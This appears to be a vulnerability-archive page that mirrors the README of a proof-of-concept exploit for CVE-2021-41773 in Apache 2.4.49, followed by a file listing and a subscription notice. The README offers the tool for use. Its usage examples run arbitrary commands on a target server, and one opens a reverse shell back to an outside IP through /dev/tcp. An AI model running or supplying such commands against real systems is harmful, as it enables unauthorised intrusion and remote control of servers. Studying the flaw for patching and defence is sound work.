关联漏洞
Description
Remote Code Execution PoC for Apache 2.4.49
介绍
# CVE-2021-41773 - Remote Code Execution in Apache 2.4.49
PoC for [CVE-2021-41773](https://nvd.nist.gov/vuln/detail/cve-2021-41773) as I just found over-complicated exploits and this one goes straight to the Remote Code Execution.
---
## Usage
Just specify the IP address running the vulnerable `Apache 2.4.49` server with `-i` and the desired system command with `-c`. If the web server is not running on port `80` we can specify it with `-p` and if the web server is using HTTPs you need to use `--use-https` flag.
```shell-session
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
```
Use it under your own responsability (:
Be ethical.
文件快照
[4.0K] /data/pocs/d477d87382a493aa14723e0b27b4680cf9b9ba42
├── [5.8K] CVE-2021-41773.py
└── [ 841] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →